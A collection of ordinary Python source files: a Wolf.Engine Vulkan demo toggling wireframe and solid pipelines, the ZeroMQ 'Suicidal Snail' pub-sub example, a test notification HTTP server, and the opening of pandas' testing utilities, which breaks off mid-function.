_script_dir = os.path.dirname(_script_path)
pyWolfPath = _script_dir
if sys.platform == "linux" or sys.platform == "linux2":
print "Linux not tested yet"
elif sys.platform == "darwin":
print "OS X not tested yet"
elif sys.platform == "win32":
pyWolfPath = pyWolfPath + "\\..\\..\\..\\..\\bin\\x64\\Debug\\Win32\\"
if pyWolfPath != "" and (not pyWolfPath in sys.path):
sys.path.append(pyWolfPath)
import ctypes, threading, pyWolf
from math import cos
from PySide import QtGui, QtCore
from PySide.QtGui import *
from PySide.QtCore import *
screen_width = 800
screen_height = 600
class gui(QWidget):
def __init__(self, parent=None):
super(gui, self).__init__(parent)
self.debug_text = ""
self._label = QLabel()
self._label.setAlignment(Qt.AlignLeft)
vbox = QVBoxLayout()
vbox.addWidget(self._label)
self.setLayout(vbox)
timer = QTimer(self)
timer.timeout.connect(self.updateTime)
timer.start(30)
def updateTime(self):
self._label.setText(self.debug_text)
class scene(QWidget):
def __init__(self, pContentPath, pLogPath, pAppName, parent = None):
super(scene, self).__init__(parent)
self.__exiting = False
self._game = pyWolf.framework.w_game(pContentPath, pLogPath, pAppName)
self._game.set_pre_init_callback(self.pre_init)
self._game.set_post_init_callback(self.post_init)
self._game.set_load_callback(self.load)
self._game.set_update_callback(self.update)
self._game.set_pre_render_callback(self.pre_render)
self._game.set_post_render_callback(self.post_render)
self._gDevice = None
self._viewport = pyWolf.graphics.w_viewport()
self._viewport_scissor = pyWolf.graphics.w_viewport_scissor()
self._draw_command_buffers = pyWolf.graphics.w_command_buffers()
self._draw_render_pass = pyWolf.graphics.w_render_pass()
self._draw_fence = pyWolf.graphics.w_fences()
self._draw_semaphore = pyWolf.graphics.w_semaphore()
self._shader = pyWolf.graphics.w_shader()
self._mesh = pyWolf.graphics.w_mesh()
self._texture = pyWolf.graphics.w_texture()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._show_wireframe = True
self._rebuild_command_buffer = True
self._solid_pipeline = pyWolf.graphics.w_pipeline()
self._wireframe_pipeline = pyWolf.graphics.w_pipeline()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_config = pyWolf.graphics.w_graphics_device_manager_configs()
_config.debug_gpu = False
self._game.set_graphics_device_manager_configs(_config)
def pre_init(self):
print "pre_init"
def post_init(self):
#get main graphics device
self._gDevice = self._game.get_graphics_device(0)
print self._gDevice.get_info()
print "post_init"
def load(self):
#initialize viewport
self._viewport.y = 0
self._viewport.width = screen_width
self._viewport.height = screen_height
self._viewport.minDepth = 0
self._viewport.maxDepth = 1
#initialize scissor of viewport
self._viewport_scissor.offset.x = 0
self._viewport_scissor.offset.y = 0
self._viewport_scissor.extent.width = screen_width
self._viewport_scissor.extent.height = screen_height
#load render pass which contains frame buffers
_render_pass_attachments = []
_output_window = self._gDevice.output_presentation_window
for _iter in _output_window.swap_chain_image_views:
# COLOR #DEPTH
_render_pass_attachments.append([_iter, _output_window.depth_buffer_image_view])
_hr = self._draw_render_pass.load(self._gDevice, self._viewport, self._viewport_scissor, _render_pass_attachments)
if _hr:
print "Error on loading render pass"
self.release()
sys.exit(1)
#create one semaphore for drawing
_hr = self._draw_semaphore.initialize(self._gDevice)
if _hr:
print "Error on initializing semaphore"
self.release()
sys.exit(1)
#create one fence for drawing
_hr = self._draw_fence.initialize(self._gDevice, 1)
if _hr:
print "Error on initializing fence(s)"
self.release()
sys.exit(1)
#create command buffer(s) for drawing
number_of_swap_chains = self._gDevice.get_number_of_swap_chains()
_hr = self._draw_command_buffers.load(self._gDevice, number_of_swap_chains, pyWolf.graphics.w_command_buffer_level.PRIMARY)
if _hr:
print "Error on initializing draw command buffer(s)"
self.release()
sys.exit(1)
#loading vertex shader
_content_path_dir = _script_dir + "/content/"
_hr = self._shader.load(self._gDevice, _content_path_dir + "shaders/shader.vert.spv", pyWolf.graphics.w_shader_stage_flag_bits.VERTEX_SHADER)
if _hr:
print "Error on loading vertex shader"
self.release()
sys.exit(1)
#loading fragment shader
_hr = self._shader.load(self._gDevice, _content_path_dir + "shaders/shader.frag.spv", pyWolf.graphics.w_shader_stage_flag_bits.FRAGMENT_SHADER)
if _hr:
print "Error on loading fragment shader"
self.release()
sys.exit(1)
_hr = self._texture.initialize(self._gDevice, 8, 8, False, False)
if _hr:
print "Error on initializing texture"
self.release()
sys.exit(1)
self._texture.set_view_type(pyWolf.graphics.w_image_view_type._2D_ARRAY)
#load texture from file
_hr = self._texture.load_texture_2D_from_file(_content_path_dir + "../../../../../Logo.jpg", True)
if _hr:
print "Error on loading " + _content_path_dir + "../../../../../Logo.jpg"
self.release()
sys.exit(1)
#just we need vertex position color
_vba = pyWolf.graphics.w_vertex_binding_attributes(pyWolf.graphics.w_vertex_declaration.VERTEX_POSITION_UV)
self._mesh.set_vertex_binding_attributes(_vba)
_shader_param_0 = pyWolf.graphics.w_shader_binding_param()
_shader_param_0.index = 0
_shader_param_0.type = pyWolf.graphics.w_shader_binding_type.SAMPLER2D
_shader_param_0.stage = pyWolf.graphics.w_shader_stage_flag_bits.FRAGMENT_SHADER
_shader_param_0.image_info = self._texture.get_descriptor_info()
_hr = self._shader.set_shader_binding_params( [_shader_param_0 ])
if _hr:
print "Set shader binding params"
#loading pipeline cache
_pipeline_cache_name = "pipeline_cache"
_hr = self._solid_pipeline.create_pipeline_cache(self._gDevice, _pipeline_cache_name)
if _hr:
print "Error on creating pipeline cache"
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_rasterization_states = pyWolf.graphics.w_graphics_device.defaults_states.pipelines.rasterization_create_info
_rasterization_states.polygon_mode = pyWolf.graphics.w_polygon_mode.LINE
_multisample_states = pyWolf.graphics.w_graphics_device.defaults_states.pipelines.multisample_create_info
_blend_states = pyWolf.graphics.w_graphics_device.defaults_states.blend_states.premulitplied_alpha
_blend_color = pyWolf.system.w_color.TRANSPARENT_()
#create pipeline
_hr = self._wireframe_pipeline.load(self._gDevice, _vba, pyWolf.graphics.w_primitive_topology.TRIANGLE_LIST, self._draw_render_pass, self._shader, [self._viewport], [ self._viewport_scissor ], _pipeline_cache_name, [], [], 0, _rasterization_states, _multisample_states, _blend_states, _blend_color)
if _hr:
print "Error on creating pipeline"
self.release()
sys.exit(1)
#create pipeline
_rasterization_states.polygon_mode = pyWolf.graphics.w_polygon_mode.FILL
_hr = self._solid_pipeline.load(self._gDevice, _vba, pyWolf.graphics.w_primitive_topology.TRIANGLE_LIST, self._draw_render_pass, self._shader, [self._viewport], [ self._viewport_scissor ], _pipeline_cache_name, [], [], 0, _rasterization_states, _multisample_states, _blend_states, _blend_color)
if _hr:
print "Error on creating pipeline"
self.release()
sys.exit(1)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_vertex_data = [
-0.7, -0.7, 0.0, #pos0
0.0, 0.0, #uv0
-0.7, 0.7, 0.0, #pos1
0.0, 1.0, #uv1
0.7, 0.7, 0.0, #pos2
1.0, 1.0, #uv2
0.7, -0.7, 0.0, #pos3
1.0, 0.0, #uv3
]
_index_data = [ 0,1,3,3,1,2 ]
#create mesh
self._mesh.set_texture(self._texture)
_hr = self._mesh.load(self._gDevice, _vertex_data, _index_data, False)
if _hr:
print "Error on loading mesh"
self.release()
sys.exit(1)
print "scene loaded successfully"
def build_command_buffers(self):
_hr = pyWolf.W_PASSED
_size = self._draw_command_buffers.get_commands_size()
for i in xrange(_size):
_cmd = self._draw_command_buffers.get_command_at(i)
_hr = self._draw_command_buffers.begin(i)
if _hr:
print "Error on begining command buffer: " + str(i)
break
self._draw_render_pass.begin(i, _cmd, pyWolf.system.w_color.CORNFLOWER_BLUE(), 1.0, 0)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
if self._show_wireframe:
self._wireframe_pipeline.bind(_cmd)
else:
self._solid_pipeline.bind(_cmd)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._mesh.draw(_cmd, None, 0, False)
self._draw_render_pass.end(_cmd)
_hr = self._draw_command_buffers.end(i)
if _hr:
print "Error on ending command buffer: " + str(i)
break
return _hr
def update(self, pGameTime):
#Update label of gui widget
global _gui
_gui.debug_text = "FPS: " + str(pGameTime.get_frames_per_second()) + "\r\n\r\nFrameTime: " + str(pGameTime.get_elapsed_seconds()) + "\r\n\r\nTotalTime: " + str(pGameTime.get_total_seconds())
if self._rebuild_command_buffer:
self._rebuild_command_buffer = False
_hr = self.build_command_buffers()
if _hr:
print "Error on building draw command buffer(s)"
self.release()
sys.exit(1)
def pre_render(self, pGameTime):
_output_window = self._gDevice.output_presentation_window
_frame_index = _output_window.swap_chain_image_index
_wait_dst_stage_mask = [ pyWolf.graphics.w_pipeline_stage_flag_bits.COLOR_ATTACHMENT_OUTPUT_BIT ]
_wait_semaphores = [ _output_window.swap_chain_image_is_available_semaphore ]
_signal_semaphores = [ _output_window.rendering_done_semaphore ]
_cmd = self._draw_command_buffers.get_command_at(_frame_index)
_cmd_buffers = [_cmd]
#reset draw fence
self._draw_fence.reset()
_hr = self._gDevice.submit(_cmd_buffers, self._gDevice.graphics_queue, _wait_dst_stage_mask, _wait_semaphores, _signal_semaphores, self._draw_fence)
if _hr:
print "Error on submit to graphics device"
return
_hr = self._draw_fence.wait()
if _hr:
print "Error on waiting for draw fence"
return
def post_render(self, pSuccessfullyRendered):
if not pSuccessfullyRendered:
print "Rendered Unsuccessfully"
def run(self):
#run game
_window_info = pyWolf.system.w_window_info()
_window_info.width = self.width()
_window_info.height = self.height()
_window_info.v_sync_enable = False
_window_info.is_full_screen = False
_window_info.swap_chain_format = 44 # BGRA8Unorm in VULKAN
_window_info.cpu_access_swap_chain_buffer = False
# get window handle
pycobject_hwnd = self.winId()
#convert window handle as HWND to unsigned integer pointer for c++
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
int_hwnd = ctypes.pythonapi.PyCObject_AsVoidPtr(pycobject_hwnd)
_window_info.set_win_id(int_hwnd)
#initialize game
_map_info = (0, _window_info)
while True:
if self.__exiting:
self.release()
break
self._game.run(_map_info)
print "Game exited"
def showEvent(self, event):
#run in another thread
threading.Thread(target=self.run).start()
event.accept()
def closeEvent(self, event):
self.__exiting = True
event.accept()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
def keyPressEvent(self, event):
_key = event.key()
if _key == QtCore.Qt.Key.Key_Escape:
self.__exiting = True
elif _key == QtCore.Qt.Key.Key_W:
self._show_wireframe = not self._show_wireframe
self._rebuild_command_buffer = True
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
def release(self):
self._draw_fence.release()
self._draw_fence = None
self._draw_semaphore.release()
self._draw_semaphore = None
self._draw_command_buffers.release()
self._draw_command_buffers = None
self._draw_render_pass.release()
self._draw_render_pass = None
self._shader.release()
self._shader = None
self._wireframe_pipeline.release()
self._wireframe_pipeline = None
self._solid_pipeline.release()
self._solid_pipeline = None
self._mesh.release()
self._mesh = None
self._texture.release()
self._texture = None
self._game.release()
self._game = None
self._gDevice = None
self._viewport = None
self._viewport_scissor = None
if __name__ == '__main__':
# Create a Qt application
_app = QApplication(sys.argv)
#Init gui
_gui = gui()
_gui.resize(screen_width /2, screen_height /2)
_gui.setWindowTitle('Wolf.Engine Debug')
#Init scene
_scene = scene(pyWolfPath + "..\\..\\..\\..\\content\\",
pyWolfPath,
"py_11_pipeline")
_scene.resize(screen_width, screen_height)
_scene.setWindowTitle('Wolf.Engine')
#Show all widgets
_scene.show()
_gui.show()
sys.exit(_app.exec_())
|
suisnail.py
|
"""
Suicidal Snail
Author: Min RK <benjaminrk@gmail.com>
"""
from __future__ import print_function
import sys
import threading
import time
from pickle import dumps, loads
import random
import zmq
from zhelpers import zpipe
# ---------------------------------------------------------------------
# This is our subscriber
# It connects to the publisher and subscribes to everything. It
# sleeps for a short time between messages to simulate doing too
# much work. If a message is more than 1 second late, it croaks.
MAX_ALLOWED_DELAY = 1.0 # secs
def subscriber(pipe):
# Subscribe to everything
ctx = zmq.Context.instance()
sub = ctx.socket(zmq.SUB)
sub.setsockopt(zmq.SUBSCRIBE, b'')
sub.connect("tcp://localhost:5556")
# Get and process messages
while True:
clock = loads(sub.recv())
# Suicide snail logic
if (time.time() - clock > MAX_ALLOWED_DELAY):
print("E: subscriber cannot keep up, aborting", file=sys.stderr)
break
# Work for 1 msec plus some random additional time
time.sleep(1e-3 * (1+2*random.random()))
pipe.send(b"gone and died")
# ---------------------------------------------------------------------
# This is our server task
# It publishes a time-stamped message to its pub socket every 1ms.
def publisher(pipe):
# Prepare publisher
ctx = zmq.Context.instance()
pub = ctx.socket(zmq.PUB)
pub.bind("tcp://*:5556")
while True:
# Send current clock (secs) to subscribers
pub.send(dumps(time.time()))
try:
signal = pipe.recv(zmq.DONTWAIT)
except zmq.ZMQError as e:
if e.errno == zmq.EAGAIN:
# nothing to recv
pass
else:
raise
else:
# received break message
break
time.sleep(1e-3) # 1msec wait
# This main thread simply starts a client, and a server, and then
# waits for the client to signal it's died.
def main():
ctx = zmq.Context.instance()
pub_pipe, pub_peer = zpipe(ctx)
sub_pipe, sub_peer = zpipe(ctx)
pub_thread = threading.Thread(target=publisher, args=(pub_peer,))
pub_thread.daemon=True
pub_thread.start()
sub_thread = threading.Thread(target=subscriber, args=(sub_peer,))
sub_thread.daemon=True
sub_thread.start()
# wait for sub to finish
sub_pipe.recv()
# tell pub to halt
pub_pipe.send(b"break")
time.sleep(0.1)
if __name__ == '__main__':
main()
|
notification.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache 2.0 License.
import os
import threading
import http.server
import queue
import json
from contextlib import contextmanager
from loguru import logger as LOG
class PostQueueRequestHandler(http.server.BaseHTTPRequestHandler):
def __init__(self, request, client_address, server):
self.queue = server.queue
self.error_queue = server.error_queue
self.checker = server.checker
super(PostQueueRequestHandler, self).__init__(request, client_address, server)
def do_POST(self):
self.send_response(201)
self.end_headers()
content_length = int(self.headers["Content-Length"])
body = self.rfile.read(content_length)
if callable(self.checker) and not self.checker(body):
LOG.error(f"Notification is not in expected format: {body}")
self.error_queue.put(body)
else:
self.queue.put(body)
def log_message(self, format, *args):
pass
class PostQueueServer(http.server.HTTPServer):
def __init__(self, server_address, RequestHandlerClass, checker=None):
assert (
RequestHandlerClass is PostQueueRequestHandler
), "Should be initialised with PostQueueRequestHandler"
self.queue = queue.Queue()
self.error_queue = queue.Queue()
self.checker = checker
super(PostQueueServer, self).__init__(server_address, PostQueueRequestHandler)
def get_queue(self):
return self.queue
def check_errors(self):
return self.error_queue.empty()
@contextmanager
def notification_server(server_info, checker=None):
host = None
port = []
if server_info is not None:
host, *port = server_info.split(":")
if not host or not (port and port[0]):
raise ValueError("Notification server host:port configuration is invalid")
else:
raise ValueError("Notification server host:port configuration is invalid")
with PostQueueServer(
(host, int(port[0])), PostQueueRequestHandler, checker
) as server:
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
LOG.success("Notification server started")
try:
yield server
finally:
assert (
server.check_errors() is True
), "Notification server caught malformed notifications"
server.shutdown()
server.server_close()
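# Usage sketch (illustrative only; the host:port and checker below are placeholders):
#
#   def is_json(body):
#       try:
#           json.loads(body)
#           return True
#       except ValueError:
#           return False
#
#   with notification_server("localhost:8765", checker=is_json) as server:
#       notification = server.get_queue().get(timeout=5)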
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import _get_lzma_file, _import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
compress_method = gzip.GzipFile
elif compression == "bz2":
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
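# Round-trip sketch (path and payload are made up for illustration):
#   write_to_compressed("gzip", "payload.csv.gz", b"a,b\n1,2\n")
#   with decompress_file("payload.csv.gz", compression="gzip") as fh:
#       assert fh.read() == b"a,b\n1,2\n"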
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
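# Illustrative calls (not part of pandas itself): both pass under the default rtol/atol.
#   assert_almost_equal(1.000001, 1.0)
#   assert_almost_equal(pd.Series([0.1 + 0.2]), pd.Series([0.3]))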
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Get a temporary path and agree to remove it on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempfile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agree to remove it on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
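# Example: order and duplicates are ignored, only the sets of elements matter.
#   equalContents([1, 2, 2, 3], (3, 1, 2))  -> True
#   equalContents([1, 2], [1, 2, 4])        -> False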
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
